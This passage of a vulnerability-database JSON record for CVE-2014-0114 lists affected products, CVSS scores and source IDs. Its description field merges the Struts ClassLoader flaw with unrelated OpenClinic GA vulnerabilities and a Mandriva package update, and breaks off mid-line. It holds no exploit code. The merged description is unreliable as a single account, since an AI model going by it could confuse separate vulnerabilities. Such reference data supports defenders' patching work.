"trust": 0.3,
"vendor": "hitachi",
"version": "7.0"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.12"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.402"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-50"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "real-time decision server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.0"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.37"
},
{
"_id": null,
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "big-ip webaccelerator hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"_id": null,
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.1"
},
{
"_id": null,
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.21"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "leads",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.6"
},
{
"_id": null,
"model": "sitescope",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "11.24.271"
},
{
"_id": null,
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.1"
},
{
"_id": null,
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0-00"
},
{
"_id": null,
"model": "tiered storage manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.1"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"_id": null,
"model": "tivoli provisioning manager for software",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "global link manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3"
},
{
"_id": null,
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.6"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "56002"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.2"
},
{
"_id": null,
"model": "infosphere identity insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "76000"
},
{
"_id": null,
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "security threat response manager 2012.1r7",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"_id": null,
"model": "global link manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-01"
},
{
"_id": null,
"model": "security threat response manager",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2013.2"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "terasoluna server framework for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.01"
},
{
"_id": null,
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.21.0"
},
{
"_id": null,
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2.0-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3.1"
},
{
"_id": null,
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4-00"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0.0-00"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.00"
},
{
"_id": null,
"model": "sitescope",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "11.13"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.5.0"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.1"
},
{
"_id": null,
"model": "enterprise data quality",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.2"
},
{
"_id": null,
"model": "predictive insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.20.0"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2.0"
},
{
"_id": null,
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.30"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"_id": null,
"model": "insurance ifrs analyzer",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "178.0.6"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"_id": null,
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2.2"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-03"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-50-09"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10500"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "retail central office 12.0.9in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.2.0"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "77000"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "global link manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"_id": null,
"model": "websphere partner gateway express edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "global link manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-10"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2.145"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.010"
},
{
"_id": null,
"model": "raplication manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.2"
},
{
"_id": null,
"model": "raplication manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.13"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.1"
},
{
"_id": null,
"model": "infosphere mashuphub",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "vcenter server update",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "5.52"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.021"
},
{
"_id": null,
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.1"
},
{
"_id": null,
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.0"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-00(x64))"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1"
},
{
"_id": null,
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00"
},
{
"_id": null,
"model": "manager",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "111.7"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-01"
},
{
"_id": null,
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-02"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"_id": null,
"model": "big-ip edge gateway hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.3.0-00"
},
{
"_id": null,
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00(x64))"
},
{
"_id": null,
"model": "big-ip edge gateway hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "web interface for content management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.4"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-03"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.20"
},
{
"_id": null,
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-01"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.60"
},
{
"_id": null,
"model": "lotus quickr for websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-02"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.4"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"_id": null,
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:nttdata:terasoluna_server_framework_for_java_web",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
}
]
},
"credits": {
"_id": null,
"data": "Rene Gielen",
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 0.9
},
"cve": "CVE-2014-0114",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-0114",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2014-000056",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-006468",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-0114",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2020-006468",
"trust": 0.8,
"value": "Critical"
},
{
"author": "IPA",
"id": "JVNDB-2014-000056",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-581",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2014-0114",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"description": {
"_id": null,
"data": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. An information management system for hospitals that can manage data such as financial management, clinical practice, and pharmacies. OpenClinic GA There are multiple vulnerabilities in. OpenClinic GA The following vulnerabilities exist in. * Avoid authentication via another path or channel (CWE-288) - CVE-2020-14485* Inappropriate restriction of excessive authentication attempts (CWE-307) - CVE-2020-14484* Improper authentication (CWE-287) - CVE-2020-14494* Lack of certification (CWE-862) - CVE-2020-14491* Execution with unnecessary privileges (CWE-250) - CVE-2020-14493* Unlimited upload of dangerous types of files (CWE-434) - CVE-2020-14488* Path traversal (CWE-22) - CVE-2020-14490* Inappropriate authorization process (CWE-285) - CVE-2020-14486* Cross-site scripting (CWE-79) - CVE-2020-14492* Use of unmaintained third-party products (CWE-1104) - CVE-2020-14495 , CVE-2016-1181 , CVE-2016-1182 Due to * Inadequate protection of credentials (CWE-522) - CVE-2020-14489* Hidden features (CWE-912) - CVE-2020-14487 * However, this vulnerability is Version 5.89.05b Does not affectThe expected impact depends on each vulnerability, but it may be affected as follows. * A remote attacker initiates a session by bypassing client-side access control or sending a specially crafted request. SQL Performs administrator functions such as query execution - CVE-2020-14485* A remote attacker bypasses the system\u0027s account lock feature and brute force attacks ( Brute force attack ) Is executed - CVE-2020-14484* In this system, brute force attack ( Brute force attack ) Insufficient protection mechanism allows an unauthenticated attacker to access the system with more than the maximum number of attempts. - CVE-2020-14494* The system SQL Since it does not check the execution permission of the query, a user with lower permission can access information that requires higher permission. - CVE-2020-14491* In this system, with relatively low authority SQL It is possible to write any file by executing, and as a result, any command is executed on the system. - CVE-2020-14493* The system does not properly validate uploaded files, so a low-privileged attacker uploads and executes arbitrary files on the system. - CVE-2020-14488* Executing a file that contains any local file specified by a parameter exposes sensitive information or executes an uploaded malicious file. - CVE-2020-14490* By avoiding the redirect process that is executed when authentication fails, an unauthenticated attacker can execute a command illegally. - CVE-2020-14486* Malicious code is executed on the user\u0027s browser because the user\u0027s input value is not properly validated. - CVE-2020-14492* Known vulnerabilities in end-of-support third-party software used by the system (CVE-2014-0114 , CVE-2016-1181 , CVE-2016-1182) Malicious code executed by a remote attacker due to * There is a flaw in the hashing process when saving the password, and the password is stolen by a dictionary attack. - CVE-2020-14489* A user account set by default exists in the system in an accessible state, and an attacker can use that account to execute arbitrary commands. - CVE-2020-14487. TERASOLUNA Server Framework for Java(Web) provided by NTT DATA Corporation is a software framework for creating Java web applications. TERASOLUNA Server Framework for Java(Web) bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated (CVE-2014-0114). Therefore, this vulnerability affects TERASOLUNA Server Framework for Java(Web) as well.On a server where the product in running, a remote attacker may steal information or execute arbitrary code. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 1.0.0 through 1.3.10 are vulnerable. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n http://advisories.mageia.org/MGASA-2014-0219.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm\n 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm\n fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm\n 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Business Server 1/X86_64:\n 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm\n 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm \n f135f96b6d2121b157b7a62afd449ea6 